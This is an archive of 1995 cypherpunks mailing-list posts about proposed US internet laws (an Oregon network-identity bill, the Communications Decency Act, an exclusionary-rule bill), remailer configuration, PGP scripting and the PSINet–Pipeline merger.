To: cypherpunks@toad.com
Subject: (fwd) OREGON HOUSE BILL 2319 - Outlaw Anoniminty??
Message-ID: <m0rcpMi-0001eTC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



Damn!! Has this been a crappy week!!!

Sam



Path: skypoint.com!scipio.cyberstore.ca!math.ohio-state.edu!howland.reston.ans.net!news.sprintlink.net!uunet!news.fc.net!ima!libertybbs!terry.liberty-parker
From: Terry.Liberty-Parker@libertybbs.ima.infomail.com (Terry Liberty-Parker)
Date: 09 Feb 95 08:26:51 
Newsgroups: comp.org.eff.talk
Subject: OREGON HOUSE BILL 2319 -
Message-ID: <ff3_9502091822@ima.infomail.com>
Organization: Austin InfoMail Association - Austin, TX
Lines: 112

-=> Note:
Forwarded (from: LIBALERT) by Terry Liberty-Parker using timEd.
Originally from ERIC GRAY (76:48/200.0) to ALL.
Original dated: Feb 05 '95, 03:42

This message was from LES LEMKE to ALL,
and was forwarded to you by ERIC GRAY.
                    -------------------------
( HB 2319 Page 1 )



       68th OREGON LEGISIATIVE ASSEMBLY - 1995 Regular Session


                       HOUSE BILL 2319

Ordered printed by the Speaker pursuant to House Rule 12.00A (5),
Presession filed (at the request of Representative Kevin Mannix)


                            SUMMARY

The following summary is not prepared by the sponsors of the measure
and is not a part of the body thereof subject to consideration by the
Legislative Assembly, It is an editor's brief statement of the
essential features of the measure as introduced.

     Directs operators of computer networks to keep records of
identity of users of network and of personal information about
individuals that is disclosed to users. Requires disclosure to
individual when information about individual is accessed by user of
network. Sets rules for disclosures. Allows injunction or maximum
civil penalty of $100,000, or both, for violation.


                          A BILL FOR AN ACT

Relating to computer information systems.

Be It Enacted by the People of the State of Oregon:

SECTION 1. As used in sections 1 to 3 of this Act:

(1) To "access" means to instruct, communicate with, store data in,
    retrieve data from or otherwise make use of any resources of a
    computer, computer system or computer network.

(2) "Computed' means, but is not limited to, an electronic device
    that performs logical, arithmetic or memory functions by the
    manipulations of electronic, magnetic or optical signals or
    impulses, and includes all input, output, processing, storage,
    software or communication facilities that are connected or
    related to such a device in a system or network.

(3) "Computer network" means, but is not limited to, the
    interconnection of communi cationlines, including microwave or
    other means of electronic communication, with a computer through
    remote terminals or a complex consisting of two or more
    interconnected computers.

(4) "Computer program" means, but is not limited to, a series of
    instructions or statements, in a form acceptable to a computer,
    that permits the functioning of a computer system in a manner
    designed to provide appropriate products from or usage of such
    computer system.

(5) "Computer software" means, but is not limited to, computer
    programs, procedures and associated documentation concerned with
    the operation of a computer system.

(6) "Computer system" means, but is not limited to, a set of related,
    connected or un connected, computer equipment, devices and
    software.

(7) "Data" means a representation of information, knowledge, facts,
    concepts, computer software, computer programs or instructions.
    "Data" may be in any form, in storage media, or as stored in the
    memory of the computer, or in transit, or presented on a display
    device. "Data" includes, but is not limited to, computer or human
    readable forms of numbers, text, stored voice, graphics and images.


SECTION 2.

(1) An owner or operator of a computer network or computer system
    shall establish procedures requiring each person who accesses the
    network or system to disclose

NOTE: Matter in boldfaced type in an amended section is new; matter
[italic and bracketed] is existing law to be omitted. New sections
are in boldfaced type.

LC 984




                                [1]



---
 * Origin: Stargate Oregon - North Bend, Oregon USA (1:356/3)

 * OLX 2.2 TD * The oldest question known to man: "Where are my keys?!"

___ GOMail v2.0t Beta [94-0145]
 - Origin: The Desert Reef * LIB * Tuc.Az * V.34 * 602 624 6386 (76:48/200)

--- timEd 1.00
 * Origin: LibertyBBS Austin,Tx [512]462-1776 (1:382/804)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 9 Feb 95 22:28:29 PST
To: dshayer@netcom.com
Subject: The question is moot: (Was: Not crypto, but scary.)
In-Reply-To: <v02110101ab60a4d6d80d@DialupEudora>
Message-ID: <Pine.SUN.3.91.950210010704.5527A-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain




With all the gafawing about the bill (666) which just flew by, and the 
"Dem's" running off about how the constitution is being dismantled, I 
thought I would cite some case law.

I direct your attention to _United States v. Leon_, 468 U.S. 897 (1984).

Justice White:

This case presents the question whether the Fourth Ammendment 
exclusionary rule should be modified so as not to bar the use in the 
prosecution's case-in-chief of evidence obtained by officers acting in 
reasonable reliance on a search warrant issued by a detached and neutral 
magistrate but ultimately found to be unsupported by probable cause.

[...]

The Fourth Amendment contains no provision expressly precluding the use 
of evidence obtained by violation if its commands, and an examination of 
its orgin and purposes makes clear that the use of fruits of a past 
unlawful search or seizure "work[s] no new Fourth Amendment wrong."  The 
wrong condemned by the Amendment is "fully accomplished" by the unlawful 
search or seizure itself, and the exclusionary rule is neither intended 
nor able to "cure the invasion of the defendant's rights which he has 
already suffered."  The rule thus operates as "a judicially created 
remedy designed to safeguard Fourth Amendment rights generally through 
its deterrant effect, rahter than a personal constitutional right of the 
person aggrieved."

[...]

First, the exclusionary rule is designed to deter police misconduct 
rather than to punish the errors of judges and magistrates.  Second, 
there exists no evidence suggesting that judges and magistrates are 
inclined to ignore or subvert the Fourth Amendment or that lawlessness 
among these actors requires application of the extreme sanction of exclusion.

[...]

[The exclusionary rule cannot be expected to deter objectively reasonable 
law enforcement activity...]

This is particularly true, we believe, when an officer acting with objective
good faith has obtained a search warrant from a judge or magistrate and acted
within its scope.  In most such cases, there is no police illegality and this
nothing to deter. It is the magistrate's responsibility to determine whether
the officer's allegations estlablish probable cause and, if so, to issue a
warrant comporting in form with the requirements of the Fourth Amendment.
In the ordinary case, an officer cannot be expected to question the
magistrate's probable-cause determination or his judgement that the form of
the warrant is technically sufficent.  "[O]nce the warrant issues, there is 
literally nothing more the policeman can do in seeking to comply with the 
law."  Penalizing the officer for the magistrate's error, rather than his 
own, cannot logically contribute to the deterrence of Fourth Amendment 
violations.

END.
++++

The bill is really just a restatement.  This has been the state of the 
law for 11 years now.

If the bill fails, the essence of the doctrine that everyone is concerned 
about stands in any event.

The question is moot.

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Fri, 10 Feb 95 02:32:10 PST
To: slowdog@wookie.net (slowdog)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.LNX.3.91.950209195950.9468A-100000@chewy.wookie.net>
Message-ID: <199502101031.FAA23805@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

[ .. ]

> > > broadcast paradigm, while the online world operates within the network 
> > > paradigm. There are no hours in which it is safe to broadcast because 
> > > there is no "broadcast" in the tradition sense.
> > 
> > Yes, I was discussing broadcasting. Scary thought is that because networks
> > are different they will try to outright ban everything.
> 
> I wonder though sometimes if it's even occurred to lawmakers that they 
> can't apply the safe harbor notion for indency to computer networks.
> 

The lawmakers have been trying to eliminate indecency (not just obscenity)
altogether... they don't want a safe harbor--that's something that came down
from the courts.

> 
> - dog
> 

Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wfgodot@iquest.com (Michael Pierson)
Date: Fri, 10 Feb 95 04:55:05 PST
To: cypherpunks@toad.com
Subject: Re: The question is moot:
In-Reply-To: <Pine.SUN.3.91.950210010704.5527A-100000@access3.digex.net>
Message-ID: <AZrElu1u6tTT079yn@iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn <unicorn@access.digex.net> wrote:

>
> With all the gafawing about the bill (666) which just flew by, and the
> "Dem's" running off about how the constitution is being dismantled, I
> thought I would cite some case law.
>
> I direct your attention to _United States v. Leon_, 468 U.S. 897 (1984).


666 and 1984.  Talk about irony.

Let's see... Fourth Amendment:

 "The right of the people to be secure in their persons, houses,
  papers, and effects, against unreasonable searches and seizures,
  shall not be violated, and no warrants shall issue, but upon
  probable cause, supported by oath or affirmation, and particularly
  describing the place to be searched, and the persons or things to
  be seized."

What part of "shall not be violated" does Justice White not get?


> Justice White:
>
> This case presents the question whether the Fourth Amendment
> exclusionary rule should be modified so as not to bar the use in the
> prosecution's case-in-chief of evidence obtained by officers acting in
> reasonable reliance on a search warrant issued by a detached and neutral
> magistrate but ultimately found to be unsupported by probable cause.
>
> [...]
>
> The Fourth Amendment contains no provision expressly precluding the use
> of evidence obtained by violation if its commands, and an examination of
> its orgin and purposes makes clear that the use of fruits of a past
> unlawful search or seizure "work[s] no new Fourth Amendment wrong."  The
> wrong condemned by the Amendment is "fully accomplished" by the unlawful
> search or seizure itself, and the exclusionary rule is neither intended
> nor able to "cure the invasion of the defendant's rights which he has
> already suffered."  The rule thus operates as "a judicially created
> remedy designed to safeguard Fourth Amendment rights generally through
> its deterrant effect, rahter than a personal constitutional right of the
> person aggrieved."
>


Obscured in White's casuistry is the fact that if evidence from
improper searches can be admitted, then the Fourth Amendment itself
is largely made "moot."  White's "this shit don't stink" sophism
notwithstanding.


>  ... Second,there exists no evidence suggesting that judges and
>  magistrates are inclined to ignore or subvert the Fourth Amendment
>  or that lawlessness among these actors requires application of the
>  extreme sanction of exclusion.


Uh Huh...


[ The rest of Justice White's police state apologia omitted.]


> END.
> ++++


> The bill is really just a restatement.  This has been the state of the
> law for 11 years now.
>
> If the bill fails, the essence of the doctrine that everyone is concerned
> about stands in any event.
>
> The question is moot.



This is actually one of the arguments that some proponents of the
bill were using during the House Floor Debate that I was watching on
CSPAN.  If this were the case, then I wondered: Why were they so
intent to pass the bill in the first place??

I don't think that the codification of this earlier Fourth Amendment 
evisceration in federal statute is something I would characterize as 
moot.  I would regard it as a pretty sickening development even if it 
only added insult to injury.  Unfortunately, I doubt that the 666 
seal of approval will fail to further contribute to the ongoing 
destruction of our rights to privacy and due process in this country.



- -Michael




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLztgftGJlWF+GPx9AQH6jwP8DWSNaOKoF7WORQjsRV3E/UbUxBYCGfLi
MKBBCC4TEQPMXy74H4CxJYjwOxBlwFcP0oB9HCAWq1XUX7JYaf7PujdlqHG/j92f
ZaoXfXdX052aXlh24P+dvMH9GZkfT71qla7Y78mfraFEXKzglcuVoE2kbgQFms/f
MaQSnMWFpuk=
=Ox0q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@panix.com>
Date: Fri, 10 Feb 95 04:19:46 PST
To: cypherpunks@toad.com (Good Guys)
Subject: Delphi and Encryption??
Message-ID: <199502101219.AA10971@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


RUPERT'S BIG PLANS Media mogul Rupert Murdoch has big plans for his
Delphi Internet Services -- he wants to boost it from fifth to first
place in online service providers. "Internet, Delphi and TV as it
becomes interactive, all will become very much integrated," predicts
HarperCollins' publishing VP. By choosing existing software modules,
such as Mosaic, instead of developing its own graphical user
interface, Murdoch hopes to leapfrog the competition and come out on
top.

Delphi's data encryption technology will also enhance its
^^^^^^^^^^^^^^^^^^^^^^^^
position among privacy-conscious consumers. (Upside Feb.'95 p.39)



Anyone know anything??

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 10 Feb 95 05:05:09 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: The question is moot: (Was: Not crypto, but scary.)
In-Reply-To: <Pine.SUN.3.91.950210010704.5527A-100000@access3.digex.net>
Message-ID: <Pine.SOL.3.90.950210075752.11373A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I've got a solution that everyone should love:

Let's go ahead and allow illegally obtained evidence - but let's
make it a capital offense for a law-enforcement officer to 
knowingly violate the 4th amendment.  

Strong 4th amendment protection and another wonderful death
penalty all in one!

Brad D.

On Fri, 10 Feb 1995, Black Unicorn wrote:

> 
> 
> With all the gafawing about the bill (666) which just flew by, and the 
> "Dem's" running off about how the constitution is being dismantled, I 
> thought I would cite some case law.
> 
> I direct your attention to _United States v. Leon_, 468 U.S. 897 (1984).
> 
> Justice White:
> 
> This case presents the question whether the Fourth Ammendment 
> exclusionary rule should be modified so as not to bar the use in the 
> prosecution's case-in-chief of evidence obtained by officers acting in 
> reasonable reliance on a search warrant issued by a detached and neutral 
> magistrate but ultimately found to be unsupported by probable cause.
> 
> [...]
> 
> The Fourth Amendment contains no provision expressly precluding the use 
> of evidence obtained by violation if its commands, and an examination of 
> its orgin and purposes makes clear that the use of fruits of a past 
> unlawful search or seizure "work[s] no new Fourth Amendment wrong."  The 
> wrong condemned by the Amendment is "fully accomplished" by the unlawful 
> search or seizure itself, and the exclusionary rule is neither intended 
> nor able to "cure the invasion of the defendant's rights which he has 
> already suffered."  The rule thus operates as "a judicially created 
> remedy designed to safeguard Fourth Amendment rights generally through 
> its deterrant effect, rahter than a personal constitutional right of the 
> person aggrieved."
> 
> [...]
> 
> First, the exclusionary rule is designed to deter police misconduct 
> rather than to punish the errors of judges and magistrates.  Second, 
> there exists no evidence suggesting that judges and magistrates are 
> inclined to ignore or subvert the Fourth Amendment or that lawlessness 
> among these actors requires application of the extreme sanction of exclusion.
> 
> [...]
> 
> [The exclusionary rule cannot be expected to deter objectively reasonable 
> law enforcement activity...]
> 
> This is particularly true, we believe, when an officer acting with objective
> good faith has obtained a search warrant from a judge or magistrate and acted
> within its scope.  In most such cases, there is no police illegality and this
> nothing to deter. It is the magistrate's responsibility to determine whether
> the officer's allegations estlablish probable cause and, if so, to issue a
> warrant comporting in form with the requirements of the Fourth Amendment.
> In the ordinary case, an officer cannot be expected to question the
> magistrate's probable-cause determination or his judgement that the form of
> the warrant is technically sufficent.  "[O]nce the warrant issues, there is 
> literally nothing more the policeman can do in seeking to comply with the 
> law."  Penalizing the officer for the magistrate's error, rather than his 
> own, cannot logically contribute to the deterrence of Fourth Amendment 
> violations.
> 
> END.
> ++++
> 
> The bill is really just a restatement.  This has been the state of the 
> law for 11 years now.
> 
> If the bill fails, the essence of the doctrine that everyone is concerned 
> about stands in any event.
> 
> The question is moot.
> 
> -uni- (Dark)
> 
> --
> 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
> 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Feb 95 08:40:21 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <ab60b81304021004b962@[137.110.24.250]>
Message-ID: <199502101639.IAA21710@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


lcottrell@popmail.ucsd.edu (Lance Cottrell) writes:

>I agree that changing mixmaster to search for a MIME line, rather than the
>:: would be no effort at all.

>I use sendmail for the client and the remailer (actually they are the same
>code), so adding new headers is easy. Unfortunately I am having some
>problems with sendmail. Sendmail is marking the messages as "Apperently
>To:" rather than "To:". Any idea what might cause that?

I think this might be caused by a disagreement between the To: address in
the message itself and whatever "To" address was passed to sendmail on
the command line.  If you pass -t to sendmail then it won't look for a
"To" address on the command line, at least as configured at my site.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 10 Feb 95 09:37:33 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: MIME based remailing commands
In-Reply-To: <199502101639.IAA21710@jobe.shell.portal.com>
Message-ID: <199502101735.JAA18715@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I think this might be caused by a disagreement between the To: address in
> the message itself and whatever "To" address was passed to sendmail on
> the command line.  If you pass -t to sendmail then it won't look for a
> "To" address on the command line, at least as configured at my site.
> 

	It doesn't matter if they disagree. If you don't have a To:
line in the header then "Apparently-To:" gets tacked on using the "To"
from the envelope.

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Fri, 10 Feb 95 12:43:17 PST
To: emerth@gpu.srv.ualberta.ca
Subject: Re: So, what's it all about?
In-Reply-To: <199502100151.RAA25844@sleepy.retix.com>
Message-ID: <OGwElyczBC4M075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199502100151.RAA25844@sleepy.retix.com>, you wrote:
> 
> >   I went to a UNIX trade show yesterday, and the main speaker was a 
> >   security type. He talked about "the cypherpunks" among other things.
> >   He said you are really scary and dangerous and ...
> >   But of course he had to also project this adress (cypherpunks@toad.com)
> >   on the screen.
> 
> can't imagine he is much of a security stud if he is that deluded.
> 
> what was his name?

Lance or Vance something.  Rottweiler, maybe?


   Alan Bostick           | The nice thing about quotes is that they give   
   abostick@netcom.com    | a nodding acquaintance with the originator
finger for PGP public key | which is often socially impressive.
Key fingerprint:          |         Kenneth Williams
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLzukWOVevBgtmhnpAQGX4gL/bsv8KcRiQcoyl+DolBYDz3/dC6sgvTDK
SGXlHo4l9t9g9IALlk4QXTmXehLTiCkVpHOc8VzjGFOi7FQ4oF3yX5TghPObNiKE
hxJrzvlYaFecq7yI74IV9mB0SFfodtRn
=sbdR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Date: Fri, 10 Feb 95 06:52:59 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: Not moot? [Was Re: The question is moot: (Was: Not crypto, but scary.)]
In-Reply-To: <Pine.SUN.3.91.950210010704.5527A-100000@access3.digex.net>
Message-ID: <Pine.3.89.9502100954.A589347486-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I was under the  impression that the House bill would change the status 
quo in one important respect: under Leon and similar cases, the "good 
faith" exception only applies when a judge or magistrate has issued a 
warrant which turns out not to be valid.  Under the House bill, this 
erosion of the exclusionary rule is extended to warrantless searches 
(presumably including electronic searches) made in "good faith".  Since 
knowledge of what the Constitution requires can destroy good faith, the 
changes likely to be made in police procedure manuals and curricula are 
left as an exercise for the reader.

OBCrypto: Buy shares in commercial crypto suppliers now.  Demand should 
be going up.

A.Michael Froomkin          | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
U.Miami Law School          | MFROOMKI@UMIAMI.IR.MIAMI.EDU
PO Box 248087               | 
Coral Gables, FL 33146 USA  | It's barely warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Fri, 10 Feb 95 06:56:08 PST
To: cypherpunks@toad.com
Subject: a draft petition against S.314
Message-ID: <Pine.LNX.3.91.950210095638.10065A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


[A draft petition, comment, but do it QUICKLY.]


In united voice, we sign this petition against passage of S.314 ("The 
Communications Decency Act of 1995") for these reasons:

S.314 would prohibit not only individual speech that is "obscene, lewd,
lascivious, filthy, or indecent", but would prohibit any provider of
telecommunications service from carrying such traffic, under threat of
stiff penalty. Even aside from the implications for free speech, this
would cause an undue - and quite possibly unjust - burden upon operators
of various telecommunications services. In a time where the citizenry and
their lawmakers alike are calling for and passing "no unfunded mandates" 
laws, it is unfortunate that Congress might seek to impose unfunded
mandates upon businesses that provide the framework for the information
age. 

The threat of such penalty alone might result in a chilling effect in the
telecommunications service community, again creating an environment
contrary to the principles of free speech, press, and assembly -
principles which entities such as the internet embody as nothing has
before.

We ask that the Senate halt any further progress of this bill. We ask 
that the Senate be an example to Congress as a whole, and to the nation 
at large - to promote the general welfare as stated in the Preamble to 
the Constitution by protecting the free flow of information and ideas 
across all of our telecommunications services.




- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Hollander <hh@xcf.Berkeley.EDU>
Date: Fri, 10 Feb 95 11:03:28 PST
To: cypherpunks@toad.com
Subject: why pgp sucks
Message-ID: <9502101849.AA21833@xcf.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


if i use a command like

	pgp filename

it will automatically figure out the right thing to do with the file.  if
it's encrypted, and i have the key, it will attempt to decrypt it.  if it
contains keys, it will ask if i want to add them to my keyring.  if it's
signed, it checks the signature.

this sucks!

if i'm trying to write a program to automatically process incoming mail (for
instance, to see if it's encrypted with a specific key), i certainly don't
want to have the possibility of people being able to add garbage to my
keyring just by mailing it to me.

is there a way of saying

	pgp -decrypt-with-key user_id filename

and have it return some error code indicating whether or not the file was in
fact encrypted with user_id, and also gauranteeing that it won't do other
fun stuff with the file, like add it to my keyring?

is there a way of using pgp in a diagnostic mode, to just inform me of what
the file contains (is it signed and/or encrypted, from who and to whom?),
without processing it, and without interaction, and without messing around
with the keyring?  has anyone written some scripts to do this kind of thing?

or should i just wait until some of the groups working on the other
encryption software get it out?

e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgh5868@ultb.isc.rit.edu (M.G. Hunsberger)
Date: Fri, 10 Feb 95 08:34:32 PST
To: cypherpunks@toad.com
Subject: HR830 - Anyone tracking this?
Message-ID: <9502101634.AA18707@ultb.isc.rit.edu>
MIME-Version: 1.0
Content-Type: text


 
The recent version of the EFFector Online had some information about the
House of Representative's Bill HR830.  They say that this bill is being
rammed through Congress and would cripple FOIA.  It would seemingly 
change any public information that is given value to non-public
information.  Does anyone have any further information?  
 
Mike 

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 10 Feb 95 09:22:43 PST
To: cypherpunks@toad.com
Subject: Global Filesystem Guild
Message-ID: <9502101722.AA04330@grape-nuts>
MIME-Version: 1.0
Content-Type: text/plain



To reduce the vulnerability of a single user/BBS to having their files
confiscated/stolen, could a distributed WAN filesystem be implemented with
k-redundancy, e.g. the files wouldn't disappear until k servers (located in
various unknown or inaccessible places) failed?  The price of storage would
vary with the level of redundancy desired.  For security the servers would
only store cyphertext, etc.  Local cacheing to reduce network load.

Andrew File System (from Transarc/IBM) implements the distributed
filesystem and namespace and some security, but not the redundancy for RW
files. (And it's not shareware).

Issues:
Quota management.
Pricing (for space or time)
Security: (only store cyphertext?)
Ownership: (who gets to delete files?)
...

Sort of the next level beyond SecureFS?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Feb 95 12:27:59 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <9502101849.AA21833@xcf.Berkeley.EDU>
Message-ID: <199502102027.MAA20904@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Hollander <hh@xcf.Berkeley.EDU> writes:

>if i use a command like

>	pgp filename

>it will automatically figure out the right thing to do with the file.  if
>it's encrypted, and i have the key, it will attempt to decrypt it.  if it
>contains keys, it will ask if i want to add them to my keyring.  if it's
>signed, it checks the signature.

>this sucks!

>if i'm trying to write a program to automatically process incoming mail (for
>instance, to see if it's encrypted with a specific key), i certainly don't
>want to have the possibility of people being able to add garbage to my
>keyring just by mailing it to me.

In my remailer, I use: pgp -f < infile > outfile.  This won't add keys.
If you capture standard error you can parse it (grep is probably good
enough) to see whether the message was signed, encrypted, had a bad
signature, had keys, etc.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Feb 95 12:32:05 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <9502101958.AA15039@snark.imsi.com>
Message-ID: <199502102031.MAA21422@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> writes:
>I'll also note, yet again, that unless PGP quits this bad practice of
>identifying counterparties only by a number, it is NOT going to be
>universally deployed. Counterparties need to be identified by a name
>that can be looked up in the DNS -- meaning "joe@foo.com" rather than
>some key ident number.

PGP of course looks up keys by strings in addition to numbers.  A widely
accepted practice is to use <joe@foo.com> in the user ID which allows the
lookups to be by internet address.  PGP was intended for use beyond the
internet, such as in bbs's, fidonet, corporate networks, etc., where DNS
style addresses may not be useful.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 10 Feb 95 09:43:36 PST
To: cypherpunks@toad.com
Subject: PSI Gulps Pipeline
Message-ID: <199502101742.MAA05625@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarding mail by: gleick@pipeline.com (James Gleick) on Fri, 
10 Feb  0:12 AM
-------------------


Dear Pipeliners,


I'm pleased to be able to tell you that the Pipeline has become 
part of  a larger enterprise: Performance Systems International 
(PSINet), the  nation's leading Internet access provider.


That means two things immediately. 


First, PSINet has a state-of-the-art dialup network in many 
cities  across the nation, and these will shortly be available 
to our users at  a cost much less than our current out-of-town 
SprintNet surcharges.


Second, PSINet plans to use our Internaut software as the basis 
for a  national service--not to replace the New York-based 
Pipeline but to  provide an alternative for out-of-towners who 
don't especially care  about New York information and services.


PSINet is a company a lot like ours--small (though not so small 
 anymore), enthusiastic, fast-moving, and steeped in Internet 
history.  The people there care about the Internet as an 
environment worth  preserving even as it grows so explosively.  
And they admire what we've  accomplished here at the Pipeline 
in forming a model online service.


That's enough for now--there will be more information following 
along  behind, but I wanted you to hear it here first.  As for 
me--this isn't  goodbye, exactly, but I have gotten a little 
behind on a book I was  supposed to be writing . . .


I am deeply grateful to all of you--staff and customers--for 
making  the Pipeline what it is and for letting me get to know 
you a little bit.


Jim


--
James Gleick
The Pipeline





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 09:57:50 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: URGENT - What S.314 Would Do
In-Reply-To: <Pine.SV4.3.91.950208020311.25943A-100000@mirage.skypoint.com>
Message-ID: <9502101755.AA04883@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 8 Feb 1995 02:18:27 -0600 (CST)
    From: Samuel Kaplin <skaplin@mirage.skypoint.com>

    . . .

    >    (B) [makes a telephone call, whether or not conversation
    >    ensues, without disclosing his identity and with intent to
    >    annoy, abuse, threaten, or harass any person at the called
    >    number] makes a telephone call or utilizes a telecommunications
    >    device, whether or not conversation or communications ensues,
    >    without disclosing his identity with intent to annoy, abuse,
    >    threaten, or harass any person at the called number or who
    >    receives the communication;
    
    Ding...Ding...Ding... We have another winner. Goodbye remailers. Probably 
    90% of remailer traffic violates this one. Well boys and girls we'd 
    better get lots more offshore...soon.

Actually, unless the quote dropped important context, this part
doesn't seem to outlaw remailers, but rather certain classes of
remailer use (``makes a call'', ``utilizes...'').  It is the user, not
the provider that this seems to address.

--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 10 Feb 95 09:58:29 PST
To: cypherpunks@toad.com
Subject: http://www.vocaltec.com/gti.html
Message-ID: <199502101758.MAA08815@ios.com>
MIME-Version: 1.0
Content-Type: text/plain


As seen on page B1 of today's WSJ:


> [Image]
> 
>               Talk over the Internet with your own voice.
>         Communicate with people from all over the world.
>           And all this with your existing Internet account.
> 
> Internet Phone (TM) is a unique software product that opens a new and
> exciting dimension for Internet users. With Internet Phone you can use
> the Internet to speak with any user all over the world! Yes, real-time
> voice conversations over the Internet, at the price of a local phone
> call or even less.
> 
> All you need is Internet Phone, a TCP\IP Internet connection and a
> Windows-compatible audio device. Plug in a microphone and speaker, run
> Internet Phone, and, by clicking a button, get in touch with Internet
> users all over the world. Whether you want to meet new friends, get
> information personally, or make the direct business contact, Internet
> Phone is for you. A friendly graphic user interface and a smart
> Voice-Activation feature make conversation a snap. VocalTec's
> sophisticated voice compression and voice transfer technology makes
> sure your voice gets across in a flash, using only a fraction of the
> available bandwidth.
> 
> Internet Phone always presents you with an updated list of topics and
> on-line users for you to choose. You can even set up Quick-Dial
> buttons which give you immediate access to frequently called users.
> Once you establish contact with a user, communication is carried out
> directly over the Internet.
> 
> [Image]
> 
> How can I order Internet Phone?
> 
> To be able to fully use Internet Phone over the Internet, you need a
> unique registration code. The Internet Phone software license can be
> purchased for only US$49! This is a special limited time offer (The
> standard retail price is $99). All you need to do is fill out and send
> us this order form, and we will supply you with the registration code.
> 
> You can even download the Internet Phone software and evaluate it for
> free! Without the registration code, you can use all of the Internet
> Phone features, but are limited to 90 seconds of speech. You have
> nothing to lose - check it out.
> 
> You can download your free evaluation copy of Internet Phone from
> ftp://ftp.vocaltec.com/iphone.zip.
> 
> For business and power users, VocalTec offers the Internet Phone Kit.
> The Internet Phone Kit includes, in addition to the Internet Phone
> software, unique hardware that improves sound quality and dramatically
> reduces bandwidth consumption.
> 
> Internet Phone System Requirements:
> 
>      486SX PC - 25 MHZ, 8MB RAM (recommended)
> 
>      WinSock 1.1
> 
>      An Internet TCP\IP connection (minimum connection: a modem
